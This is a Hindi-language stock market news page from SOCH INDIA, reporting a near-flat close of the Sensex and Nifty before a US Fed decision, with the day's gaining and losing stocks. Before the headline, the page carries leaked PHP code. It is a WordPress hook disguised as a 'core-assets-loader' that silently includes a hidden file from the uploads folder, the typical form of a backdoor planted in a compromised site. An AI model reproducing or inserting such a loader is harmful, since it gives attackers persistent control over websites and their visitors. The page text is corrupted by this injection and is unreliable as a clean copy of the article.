add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सेंसेक्स 16 अंक ऊपर 35,176 पर, निफ्टी 10,720 के नीचे बंद – SOCH INDIA
Menu

टेक्नोलॉजी
सेंसेक्स 16 अंक ऊपर 35,176 पर, निफ्टी 10,720 के नीचे बंद

nobanner

घरेलू शेयर बाजार की सारी तेजी आज गायब हो गई और बाजार लगभग सपाट होकर बंद हुआ है. अमेरिकी फेडरल रिजर्व के नतीजों से पहले बंबई शेयर बाजार के सेंसेक्स में सतर्क रुख दिखा. ब्रोकरों ने कहा कि अमेरिकी फेडरल रिजर्व की नीतिगत बैठक के नतीजों से पहले निवेशकों के सतर्क रुख से बाजार में गिरावट आई है.

कैसी रही बाजार की चाल
आज के कारोबार में बीएसई का 30 शेयरों वाला इंडेक्स सेंसेक्स 16.06 अंक यानी 0.05 फीसदी की तेजी के साथ 35,176.42 पर जाकर बंद हुआ है और एनएसई का 50 शेयरों वाला इंडेक्स निफ्टी 21.30 अंक यानी 0.20 फीसदी की गिरावट के साथ 10,718.05 पर बंद हुआ है.

सेक्टोरियल इंडेक्स
एफएमसीजी, बैंक और फाइनेंशियल शेयरों में तेजी रही और बाकी सेक्टोरियल इंडेक्स में गिरावट के लाल निशान के साथ कारोबार बंद हुआ है.

निफ्टी के शेयरों का हाल
आज के कारोबार के दौरान निफ्टी के सिर्फ 15 शेयरों में ही तेजी रही और बाकी 35 शेयरों में गिरावट के लाल निशान के साथ कारोबार बंद हुआ है. आज चढ़ने वाले शेयरों में कोटक बैंक 4 फीसदी, जी एंटरटेनमेंट 2.03 फीसदी, आईटीसी 1.83 फीसदी और एक्सिस बैंक 1.46 फीसदी की उछाल पर बंद हुए है. एशियन पेंट्स 1.40 फीसदी की उछाल पर बंद होने में कामयाब हुआ है.

वहीं गिरने वाले शेयरों में आज वेदांता करीब 5 फीसदी नीचे बंद हुआ है. एचसीएल टेक 4.50 फीसदी की सुस्ती पर बंद हुआ है. हिंडाल्को 3.54 फीसदी, टाटा स्टील 3.39 फीसदी नीचे रहा है. एचयूएल का शेयर 2.51 फीसदी की गिरावट के साथ बंद हुआ है.